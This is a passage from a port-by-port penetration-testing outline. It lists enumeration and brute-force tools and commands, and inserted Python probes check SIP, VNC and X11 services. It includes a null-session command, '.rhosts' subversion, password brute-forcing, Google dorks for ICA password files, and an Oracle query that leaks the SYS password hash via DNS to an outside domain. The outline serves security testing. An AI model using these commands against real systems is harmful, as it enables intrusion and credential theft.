16.9.6.6.8. /LAN_IP.html (LAN)
16.9.6.6.9. /NAT_General.html (NAT)
16.9.6.6.10. /ViewLog.html (Logs)
16.9.6.6.11. /rpFWUpload.html (Tools)
16.9.6.6.12. /DiagGeneral.html (Diagnostic)
16.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)
16.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
16.9.6.6.15. Config Backups
16.9.7. Examine web server logs
16.9.7.1. c:\winnt\system32\Logfiles\W3SVC1
16.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq
16.9.8. References
16.9.8.1. White Papers
16.9.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
16.9.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
16.9.8.1.3. Blind Security Testing - An Evolutionary Approach
16.9.8.1.4. Command Injection in XML Signatures and Encryption
16.9.8.1.5. Input Validation Cheat Sheet
16.9.8.1.6. SQL Injection Cheat Sheet
16.9.8.2. Books
16.9.8.2.1. Hacking Exposed Web 2.0
16.9.8.2.2. Hacking Exposed Web Applications
16.9.8.2.3. The Web Application Hacker's Handbook
16.9.9. Exploit Frameworks
16.9.9.1. Brute-force Tools
16.9.9.1.1. Acunetix
16.9.9.2. Metasploit
16.9.9.3. w3af
16.10. Portmapper port 111 open
16.10.1. rpcdump.py
16.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
16.10.2. rpcinfo
16.10.2.1. rpcinfo [options] IP_Address
16.11. NTP Port 123 open
16.11.1. NTP Enumeration
16.11.1.1. ntpdc -c monlist IP_ADDRESS
16.11.1.2. ntpdc -c sysinfo IP_ADDRESS
16.11.1.3. ntpq
16.11.1.3.1. host
16.11.1.3.2. hostname
16.11.1.3.3. ntpversion
16.11.1.3.4. readlist
16.11.1.3.5. version
16.11.2. Examine configuration files
16.11.2.1. ntp.conf
16.11.3. nmap nse script
16.11.3.1. ntp-info
16.12. NetBIOS Ports 135-139,445 open
16.12.1. NetBIOS enumeration
16.12.1.1. Enum
16.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
16.12.1.2. Null Session
16.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
16.12.1.3. Smbclient
16.12.1.3.1. smbclient -L //server/share password options
16.12.1.4. Superscan
16.12.1.4.1. Enumeration tab.
16.12.1.5. user2sid/sid2user
16.12.1.6. Winfo
16.12.2. NetBIOS brute force
16.12.2.1. Hydra
16.12.2.2. Brutus
16.12.2.3. Cain & Abel
16.12.2.4. getacct
16.12.2.5. NAT (NetBIOS Auditing Tool)
16.12.3. Examine Configuration Files
16.12.3.1. Smb.conf
16.12.3.2. lmhosts
16.13. SNMP port 161 open
16.13.1. Default Community Strings
16.13.1.1. public
16.13.1.2. private
16.13.1.3. cisco
16.13.1.3.1. cable-docsis
16.13.1.3.2. ILMI
16.13.2. MIB enumeration
16.13.2.1. Windows NT
16.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
16.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
16.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
16.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
16.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
16.13.2.2. Solarwinds MIB walk
16.13.2.3. Getif
16.13.2.4. snmpwalk
16.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
16.13.2.5. Snscan
16.13.2.6. Applications
16.13.2.6.1. ZyXel
16.13.2.7. nmap nse script
16.13.2.7.1. snmp-sysdescr
16.13.3. SNMP Bruteforce
16.13.3.1. onesixtyone
16.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>
16.13.3.2. cat
16.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
16.13.3.3. Solarwinds SNMP Brute Force
16.13.3.4. ADMsnmp
16.13.3.5. nmap nse script
16.13.3.5.1. snmp-brute
16.13.4. Examine SNMP Configuration files
16.13.4.1. snmp.conf
16.13.4.2. snmpd.conf
16.13.4.3. snmp-config.xml
16.14. LDAP Port 389 Open
16.14.1. ldap enumeration
16.14.1.1. ldapminer
16.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
16.14.1.2. luma
16.14.1.2.1. Gui based tool
16.14.1.3. ldp
16.14.1.3.1. Gui based tool
16.14.1.4. openldap
16.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
16.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
16.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
16.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
16.14.2. ldap brute force
16.14.2.1. bf_ldap
16.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate
16.14.2.1.1.1. optional: -p port (default 389)
16.14.2.1.1.2. optional: -v (verbose mode)
16.14.2.1.1.3. optional: -P Ldap user path (default ,CN=Users,)
16.14.2.2. K0ldS
16.14.2.3. LDAP_Brute.pl
16.14.3. Examine Configuration Files
16.14.3.1. General
16.14.3.1.1. containers.ldif
16.14.3.1.2. ldap.cfg
16.14.3.1.3. ldap.conf
16.14.3.1.4. ldap.xml
16.14.3.1.5. ldap-config.xml
16.14.3.1.6. ldap-realm.xml
16.14.3.1.7. slapd.conf
16.14.3.2. IBM SecureWay V3 server
16.14.3.2.1. V3.sas.oc
16.14.3.3. Microsoft Active Directory server
16.14.3.3.1. msadClassesAttrs.ldif
16.14.3.4. Netscape Directory Server 4
16.14.3.4.1. nsslapd.sas_at.conf
16.14.3.4.2. nsslapd.sas_oc.conf
16.14.3.5. OpenLDAP directory server
16.14.3.5.1. slapd.sas_at.conf
16.14.3.5.2. slapd.sas_oc.conf
16.14.3.6. Sun ONE Directory Server 5.1
16.14.3.6.1. 75sas.ldif
16.15. PPTP/L2TP/VPN port 500/1723 open
16.15.1. Enumeration
16.15.1.1. ike-scan
16.15.1.2. ike-probe
16.15.2. Brute-Force
16.15.2.1. ike-crack
16.15.3. Reference Material
16.15.3.1. PSK cracking paper
16.15.3.2. SecurityFocus Infocus
16.15.3.3. Scanning a VPN Implementation
16.16. Modbus port 502 open
16.16.1. modscan
16.17. rlogin port 513 open
16.17.1. Rlogin Enumeration
16.17.1.1. Find the files
16.17.1.1.1. find / -name .rhosts
16.17.1.1.2. locate .rhosts
16.17.1.2. Examine Files
16.17.1.2.1. cat .rhosts
16.17.1.3. Manual Login
16.17.1.3.1. rlogin hostname -l username
16.17.1.3.2. rlogin <IP>
16.17.1.4. Subvert the files
16.17.1.4.1. echo ++ > .rhosts
16.17.2. Rlogin Brute force
16.17.2.1. Hydra
16.18. rsh port 514 open
16.18.1. Rsh Enumeration
16.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
16.18.2. Rsh Brute Force
16.18.2.1. rsh-grind
16.18.2.2. Hydra
16.18.2.3. medusa
16.19. SQL Server Ports 1433, 1434 open
16.19.1. SQL Enumeration
16.19.1.1. piggy
16.19.1.2. SQLPing
16.19.1.2.1. sqlping ip_address/hostname
16.19.1.3. SQLPing2
16.19.1.4. SQLPing3
16.19.1.5. SQLpoke
16.19.1.6. SQL Recon
16.19.1.7. SQLver
16.19.2. SQL Brute Force
16.19.2.1. SQLPAT
16.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
16.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
16.19.2.2. SQL Dict
16.19.2.3. SQLAT
16.19.2.4. Hydra
16.19.2.5. SQLlhf
16.19.2.6. ForceSQL
16.20. Citrix port 1494 open
16.20.1. Citrix Enumeration
16.20.1.1. Default Domain
16.20.1.2. Published Applications
16.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
16.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
16.20.2. Citrix Brute Force
16.20.2.1. bforce.js
16.20.2.2. connect.js
16.20.2.3. Citrix Brute-forcer
16.20.2.4. Reference Material
16.20.2.4.1. Hacking Citrix - the legitimate backdoor
16.20.2.4.2. Hacking Citrix - the forceful way
16.21. Oracle Port 1521 Open
16.21.1. Oracle Enumeration
16.21.1.1. oracsec
16.21.1.2. Repscan
16.21.1.3. Sidguess
16.21.1.4. Scuba
16.21.1.5. DNS/HTTP Enumeration
16.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
16.21.1.5.2. Untitled
16.21.1.6. WinSID
16.21.1.7. Oracle default password list
16.21.1.8. TNSVer
16.21.1.8.1. tnsver host [port]
16.21.1.9. TCP Scan
16.21.1.10. Oracle TNSLSNR
16.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
16.21.1.11. TNSCmd
16.21.1.11.1. perl tnscmd.pl -h ip_address
16.21.1.11.2. perl tnscmd.pl version -h ip_address
16.21.1.11.3. perl tnscmd.pl status -h ip_address
16.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
16.21.1.12. LSNrCheck
16.21.1.13. Oracle Security Check (needs credentials)
16.21.1.14. OAT
16.21.1.14.1. sh opwg.sh -s ip_address
16.21.1.14.2. opwg.bat -s ip_address
16.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
16.21.1.15. OScanner
16.21.1.15.1. sh oscanner.sh -s ip_address
16.21.1.15.2. oscanner.exe -s ip_address
16.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
16.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
16.21.1.16. NGS Squirrel for Oracle
16.21.1.17. Service Register
16.21.1.17.1. Service-register.exe ip_address
16.21.1.18. PLSQL Scanner 2008
16.21.2. Oracle Brute Force
16.21.2.1. OAK
16.21.2.1.1. ora-getsid hostname port sid_dictionary_list
16.21.2.1.2. ora-auth-alter-session host port sid username password sql
16.21.2.1.3. ora-brutesid host port start
16.21.2.1.4. ora-pwdbrute host port sid username password-file
16.21.2.1.5. ora-userenum host port sid userlistfile
16.21.2.1.6. ora-ver -e (-f -l -a) host port
16.21.2.2. breakable (Targets Application Server Port)
16.21.2.2.1. breakable.exe host url [port] [v]
16.21.2.2.1.1. host - ip_address of the Oracle Portal Server
16.21.2.2.1.2. url - PATH_INFO i.e. /pls/orasso
16.21.2.2.1.3. port - TCP port Oracle Portal Server is serving pages from
16.21.2.2.1.4. v - verbose
16.21.2.3. SQLInjector (Targets Application Server Port)
16.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
16.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
16.21.2.4. Check Password
16.21.2.5. orabf
16.21.2.5.1. orabf [hash]:[username] [options]
16.21.2.6. thc-orakel
16.21.2.6.1. Cracker
16.21.2.6.2. Client
16.21.2.6.3. Crypto
16.21.2.7. DBVisualisor
16.21.2.7.1. Sql scripts from pentest.co.uk
16.21.2.7.2. Manual sql input of previously reported vulnerabilities
16.21.3. Oracle Reference Material
16.21.3.1. Understanding SQL Injection
16.21.3.2. SQL Injection walkthrough
16.21.3.3. SQL Injection by example
16.21.3.4. Advanced SQL Injection in Oracle databases
16.21.3.5. Blind SQL Injection
16.21.3.6. SQL Cheatsheets
16.21.3.6.1. Untitled
16.22. NFS Port 2049 open
16.22.1. NFS Enumeration
16.22.1.1. showmount -e hostname/ip_address
16.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
16.22.2. NFS Brute Force
16.22.2.1. Interact with NFS share and try to add/delete
16.22.2.2. Exploit and Confuse Unix
16.22.3. Examine Configuration Files
16.22.3.1. /etc/exports
16.22.3.2. /etc/lib/nfs/xtab
16.22.4. nmap nse script
16.22.4.1. nfs-showmount
16.23. Compaq/HP Insight Manager Ports 2301, 2381 open
16.23.1. HP Enumeration
16.23.1.1. Authentication Method
16.23.1.1.1. Host OS Authentication
16.23.1.1.2. Default Authentication
16.23.1.2. Wikto
16.23.1.3. Nstealth
16.23.2. HP Bruteforce
16.23.2.1. Hydra
16.23.2.2. Acunetix
16.23.3. Examine Configuration Files
16.23.3.1. path.properties
16.23.3.2. mx.log
16.23.3.3. CLIClientConfig.cfg
16.23.3.4. database.props
16.23.3.5. pg_hba.conf
16.23.3.6. jboss-service.xml
16.23.3.7. .namazurc
16.24. MySQL port 3306 open
16.24.1. Enumeration
16.24.1.1. nmap -A -n -p3306 <IP Address>
16.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
16.24.1.3. telnet IP_Address 3306
16.24.1.4. use test; select * from test;
16.24.1.5. To check for other DB's -- show databases
16.24.2. Administration
16.24.2.1. MySQL Network Scanner
16.24.2.2. MySQL GUI Tools
16.24.2.3. mysqlshow
16.24.2.4. mysqlbinlog
16.24.3. Manual Checks
16.24.3.1. Default usernames and passwords
16.24.3.1.1. username: root password:
16.24.3.1.2. testing
16.24.3.2. Configuration Files
16.24.3.2.1. Operating System
16.24.3.2.2. Command History
16.24.3.2.3. Log Files
16.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
16.24.3.2.5. MySQL data directory (Location specified in my.cnf)
16.24.3.2.6. SSL Check
16.24.3.3. Privilege Escalation
16.24.3.3.1. Current Level of access
16.24.3.3.2. Access passwords
16.24.3.3.3. Create a new user and grant him privileges
16.24.3.3.4. Break into a shell
16.24.4. SQL injection
16.24.4.1. mysql-miner.pl
16.24.4.1.1. mysql-miner.pl http://target/ expected_string database
16.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
16.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
16.24.5. References
16.24.5.1. Design Weaknesses
16.24.5.1.1. MySQL running as root
16.24.5.1.2. Exposed publicly on Internet
16.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
16.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
16.25. RDesktop port 3389 open
16.25.1. Rdesktop Enumeration
16.25.1.1. Remote Desktop Connection
16.25.2. Rdesktop Bruteforce
16.25.2.1. TSGrinder
16.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
16.25.2.2. Tscrack
16.26. Sybase Port 5000+ open
16.26.1. Sybase Enumeration
16.26.1.1. sybase-version ip_address from NGS
16.26.2. Sybase Vulnerability Assessment
16.26.2.1. Use DbVisualizer
16.26.2.1.1. Sybase Security checksheet
16.26.2.1.2. Manual SQL input of previously reported vulnerabilities
16.26.2.2. NGS Squirrel for Sybase
16.27. SIP Port 5060 open
16.27.1. SIP Enumeration
16.27.1.1. netcat
16.27.1.1.1. nc IP_Address Port
16.27.1.2. sipflanker
16.27.1.2.1. python sipflanker.py 192.168.1-254
16.27.1.3. Sipscan
16.27.1.4. smap
16.27.1.4.1. smap IP_Address/Subnet_Mask
16.27.1.4.2. smap -o IP_Address/Subnet_Mask
16.27.1.4.3. smap -l IP_Address
16.27.2. SIP Packet Crafting etc.
16.27.2.1. sipsak
16.27.2.1.1. Tracing paths: sipsak -T -s sip:username@domain
16.27.2.1.2. OPTIONS request: sipsak -vv -s sip:username@domain
16.27.2.1.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
16.27.2.2. siprogue
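Worked example, added here and not from the original page: a minimal OPTIONS probe in Python, the same request `sipsak -vv -s sip:username@domain` sends, with a parser for the reply that expands RFC 3261 compact header names and pulls out the User-Agent/Server banner and the Allow list (which methods the target accepts is what the flooders and fuzzers elsewhere in this framework key on). The reply shown is constructed for the example; the 192.0.2.x addresses and the `ExamplePBX/2.1` banner are placeholders. `probe()` sends the request for real.

```python
import secrets
import socket

# RFC 3261 compact header names, expanded so header lookups are uniform.
COMPACT = {"v": "via", "f": "from", "t": "to", "i": "call-id", "m": "contact",
           "l": "content-length", "c": "content-type", "k": "supported", "s": "subject"}


def build_options(target, port=5060, user="100", local_ip="192.0.2.10", local_port=5060, cseq=1):
    """Build one SIP OPTIONS request.

    local_ip is a placeholder: with ;rport the far end replies to the source
    address and port it actually saw, so a wrong Via still gets an answer.
    """
    branch = "z9hG4bK" + secrets.token_hex(8)      # magic cookie + unique branch id
    lines = [
        "OPTIONS sip:%s@%s:%d SIP/2.0" % (user, target, port),
        "Via: SIP/2.0/UDP %s:%d;branch=%s;rport" % (local_ip, local_port, branch),
        "Max-Forwards: 70",
        "From: <sip:probe@%s>;tag=%s" % (local_ip, secrets.token_hex(4)),
        "To: <sip:%s@%s>" % (user, target),
        "Call-ID: %s@%s" % (secrets.token_hex(8), local_ip),
        "CSeq: %d OPTIONS" % cseq,
        "Contact: <sip:probe@%s:%d>" % (local_ip, local_port),
        "Accept: application/sdp",
        "Content-Length: 0",
        "", "",                                       # blank line ends the headers
    ]
    return "\r\n".join(lines).encode()


def parse_response(data):
    """Parse a SIP response into status, headers (lower-cased, compact forms expanded) and body."""
    text = data.decode("utf-8", "replace")
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("SIP/2.0"):
        raise ValueError("not a SIP response: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name = name.strip().lower()
        headers.setdefault(COMPACT.get(name, name), []).append(value.strip())
    allow = ",".join(headers.get("allow", []))
    return {
        "status": int(parts[1]),
        "reason": parts[2] if len(parts) > 2 else "",
        "headers": headers,
        # PBXs and phones identify themselves in User-Agent; proxies use Server.
        "user_agent": (headers.get("user-agent") or headers.get("server") or [None])[0],
        "allow": [m.strip() for m in allow.split(",") if m.strip()],
        "body": body,
    }


def probe(target, port=5060, timeout=2.0):
    """Send one OPTIONS over UDP and parse the reply (network; not used by the tests)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_options(target, port), (target, port))
        data, _ = sock.recvfrom(65535)
    finally:
        sock.close()
    return parse_response(data)


# Constructed sample reply for the example (not captured from a real PBX).
SAMPLE_RESPONSE = (
    b"SIP/2.0 200 OK\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-1;received=192.0.2.10;rport=5060\r\n"
    b"From: <sip:probe@192.0.2.10>;tag=abcd\r\n"
    b"To: <sip:100@192.0.2.20>;tag=as1e2f\r\n"
    b"Call-ID: 1@192.0.2.10\r\n"
    b"CSeq: 1 OPTIONS\r\n"
    b"User-Agent: ExamplePBX/2.1\r\n"
    b"Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO\r\n"
    b"k: replaces, timer\r\n"                          # compact form of Supported
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    reply = parse_response(SAMPLE_RESPONSE)
    print(reply["status"], reply["reason"], reply["user_agent"])
    print(reply["allow"], reply["headers"]["supported"])
```

A 200 to OPTIONS from an unknown From is itself a finding on some deployments (the target talks to anyone); a 401/407 tells you the challenge realm, which the brute-force tools in 16.27.3 need.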
16.27.3. SIP Vulnerability Scanning/ Brute Force
16.27.3.1. tftp bruteforcer
16.27.3.1.1. Default dictionary file
16.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
16.27.3.2. VoIPaudit
16.27.3.3. SiVuS
16.27.4. Examine Configuration Files
16.27.4.1. SIPDefault.cnf
16.27.4.2. asterisk.conf
16.27.4.3. sip.conf
16.27.4.4. phone.conf
16.27.4.5. sip_notify.conf
16.27.4.6. <Ethernet address>.cfg
16.27.4.7. 000000000000.cfg
16.27.4.8. phone1.cfg
16.27.4.9. sip.cfg etc. etc.
16.28. VNC port 5900+ open
16.28.1. VNC Enumeration
16.28.1.1. Scans
16.28.1.1.1. 5900+ for direct access (display N listens on 5900+N); 5800+ for the HTTP/Java viewer.
16.28.2. VNC Brute Force
16.28.2.1. Password Attacks
16.28.2.1.1. Remote
16.28.2.1.2. Local
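Worked example, added here (not the page's own code): the RFB handshake up to the point where the server announces its security types, which is what a scanner on 5900+ needs to know before any password attack. RFB 3.3 servers dictate a single type; 3.7/3.8 servers offer a list, and a count of zero carries a refusal reason (what you see once a server has started rate-limiting failed logins). The sample messages are constructed; `grab()` does the live exchange, never claiming a version newer than 3.8.

```python
import re
import socket
import struct

# RFB security types (RFC 6143 plus the common registered ones).
SECURITY_TYPES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  16: "Tight", 17: "Ultra", 18: "TLS", 19: "VeNCrypt"}


def parse_version(banner):
    """Decode the 12-byte 'RFB xxx.yyy\\n' banner into (major, minor)."""
    m = re.fullmatch(rb"RFB (\d{3})\.(\d{3})\n", banner)
    if not m:
        raise ValueError("not an RFB banner: %r" % banner)
    return int(m.group(1)), int(m.group(2))


def _reason(data, pos):
    """Length-prefixed (4-byte big-endian) reason string at pos."""
    (n,) = struct.unpack_from(">I", data, pos)
    return data[pos + 4:pos + 4 + n].decode("utf-8", "replace")


def parse_security(version, data):
    """Decode the security-type message that follows the version exchange.

    RFB 3.3: the server dictates one type as a 4-byte big-endian value (0 = failure).
    RFB 3.7/3.8: a 1-byte count then the offered types (count 0 = failure,
    followed by a reason such as 'Too many authentication failures').
    """
    if version < (3, 7):
        (stype,) = struct.unpack_from(">I", data, 0)
        if stype == 0:
            raise ValueError("server refused: " + _reason(data, 4))
        return [stype]
    count = data[0]
    if count == 0:
        raise ValueError("server refused: " + _reason(data, 1))
    return list(data[1:1 + count])


def assess(types):
    """Name the offered types and flag the ones that matter for a password attack."""
    names = [SECURITY_TYPES.get(t, "unknown(%d)" % t) for t in types]
    notes = []
    if 1 in types:
        notes.append("type None offered: display opens without any password")
    if 2 in types:
        notes.append("VNC Authentication offered: DES challenge/response on an 8-byte password, "
                     "no lockout in the protocol itself")
    if not set(types) & {18, 19}:
        notes.append("no TLS/VeNCrypt: session and any password exchange are unencrypted")
    return names, notes


def grab(host, port=5900, timeout=5.0):
    """Talk to a live server up to the security-type message (network; not used by the tests)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        version = parse_version(sock.recv(12))
        ours = min(version, (3, 8))                # never claim a version newer than we speak
        sock.sendall(b"RFB %03d.%03d\n" % ours)
        return ours, parse_security(ours, sock.recv(256))


# Constructed sample messages for the example (not captured from a real server).
SAMPLE_BANNER = b"RFB 003.008\n"
SAMPLE_TYPES = b"\x02\x01\x02"                     # two types offered: None, VNC Authentication
_REASON = b"Too many authentication failures"
SAMPLE_REFUSED = b"\x00" + struct.pack(">I", len(_REASON)) + _REASON
SAMPLE_V33 = b"\x00\x00\x00\x02"                   # RFB 3.3 server demanding VNC Authentication

if __name__ == "__main__":
    ver = parse_version(SAMPLE_BANNER)
    print(ver, assess(parse_security(ver, SAMPLE_TYPES)))
```

A refusal with a "Too many authentication failures" reason during a remote password attack means the server is blacklisting your source; pause rather than burn the remaining wordlist.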
16.28.3. Examine Configuration Files
16.28.3.1. .vnc
16.28.3.2. /etc/vnc/config
16.28.3.3. $HOME/.vnc/config
16.28.3.4. /etc/sysconfig/vncservers
16.28.3.5. /etc/vnc.conf
16.29. X11 port 6000+ open
16.29.1. X11 Enumeration
16.29.1.1. List open windows
16.29.1.2. Authentication Method
16.29.1.2.1. Xauth
16.29.1.2.2. Xhost
16.29.2. X11 Exploitation
16.29.2.1. xwd
16.29.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xwd
16.29.2.2. Keystrokes
16.29.2.2.1. Received
16.29.2.2.2. Transmitted
16.29.2.3. Screenshots
16.29.2.4. xhost +
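Worked example, added here rather than taken from the original page: the X11 connection-setup exchange, which tells an xhost-open display apart from one protected by xauth without needing an X client installed. An empty authorization name and data in the setup request is what a cookieless client sends; an xhost-denied server answers Failed with the reason "No protocol specified", a permissive one answers Success with its vendor string. Both replies below are constructed for the example; `check_display()` runs it against a live host, optionally with a MIT-MAGIC-COOKIE-1 value taken from `xauth list`.

```python
import socket
import struct


def _pad4(b):
    """Pad to a multiple of 4 bytes, as the X protocol requires for variable fields."""
    return b + b"\x00" * (-len(b) % 4)


def build_setup(auth_name=b"", auth_data=b""):
    """Build the X11 connection-setup request (little-endian, protocol 11.0).

    With empty auth fields this is exactly what a client holding no xauth
    cookie sends, so the reply shows whether the display is host-list (xhost) open.
    """
    hdr = struct.pack("<cxHHHHxx", b"l", 11, 0, len(auth_name), len(auth_data))
    return hdr + _pad4(auth_name) + _pad4(auth_data)


def parse_setup_reply(data):
    """Decode the server's setup reply: 0 = Failed, 1 = Success, 2 = Authenticate."""
    status = data[0]
    if status == 0:
        n = data[1]                                   # reason length
        major, minor = struct.unpack_from("<HH", data, 2)
        return {"status": "failed", "version": (major, minor),
                "reason": data[8:8 + n].decode("latin-1")}
    if status == 2:
        (units,) = struct.unpack_from("<H", data, 6)  # additional data length in 4-byte units
        return {"status": "authenticate",
                "reason": data[8:8 + units * 4].rstrip(b"\x00").decode("latin-1")}
    if status == 1:
        major, minor = struct.unpack_from("<HH", data, 2)
        (vlen,) = struct.unpack_from("<H", data, 24)  # vendor length, 16 bytes into the body
        return {"status": "success", "version": (major, minor),
                "vendor": data[40:40 + vlen].decode("latin-1")}
    raise ValueError("unknown setup status %d" % status)


def check_display(host, display=0, timeout=5.0, cookie=None):
    """Probe host:display over TCP 6000+display (network; not used by the tests).

    cookie, if given, is the 16-byte MIT-MAGIC-COOKIE-1 value from `xauth list`.
    """
    req = build_setup(b"MIT-MAGIC-COOKIE-1", cookie) if cookie else build_setup()
    with socket.create_connection((host, 6000 + display), timeout=timeout) as sock:
        sock.sendall(req)
        return parse_setup_reply(sock.recv(4096))


# Constructed sample replies for the example (not captured from a real server).
_DENY = b"No protocol specified"                      # what Xorg says when xhost denies you
SAMPLE_DENIED = (b"\x00" + bytes([len(_DENY)]) +
                 struct.pack("<HHH", 11, 0, (len(_DENY) + 3) // 4) + _pad4(_DENY))
_VENDOR = b"The X.Org Foundation"
_BODY = bytearray(32)                                 # fixed part of the success body
struct.pack_into("<H", _BODY, 16, len(_VENDOR))
SAMPLE_OPEN = (b"\x01\x00" + struct.pack("<HHH", 11, 0, (32 + len(_VENDOR)) // 4) +
               bytes(_BODY) + _pad4(_VENDOR))

if __name__ == "__main__":
    print(parse_setup_reply(SAMPLE_DENIED))
    print(parse_setup_reply(SAMPLE_OPEN))
```

A Success reply to the cookieless request is the condition under which the xwd screenshot and keystroke captures above work; a Failed reply with "No protocol specified" means the host list is enforced and you need a cookie.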
16.29.3. Examine Configuration Files
16.29.3.1. /etc/Xn.hosts
16.29.3.2. /usr/lib/X11/xdm
16.29.3.3. /usr/lib/X11/xdm/xsession
16.29.3.4. /usr/lib/X11/xdm/xsession-remote
16.29.3.5. /usr/lib/X11/xdm/xsession.0
16.29.3.6. /usr/lib/X11/xdm/xdm-config
16.29.3.6.1. DisplayManager*authorize:on
16.30. Tor Port 9001, 9030 open
16.30.1. Tor Node Checker
16.30.1.1. Ip Pages
16.30.1.2. Kewlio.net
16.30.2. nmap NSE script
16.31. JetDirect port 9100 open
16.31.1. hijetter
17. Final Report - template
20. Citrix Specific Testing
20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information has been put together to help you conduct a vulnerability assessment or penetration test against Citrix.
20.2. Enumeration
20.2.1. web search
20.2.1.1. Google (GHDB)
20.2.1.1.1. ext:ica
20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
20.2.1.1.3. [WFClient] Password= filetype:ica
20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
20.2.1.1.6. inurl:/Citrix/Nfuse17/
20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
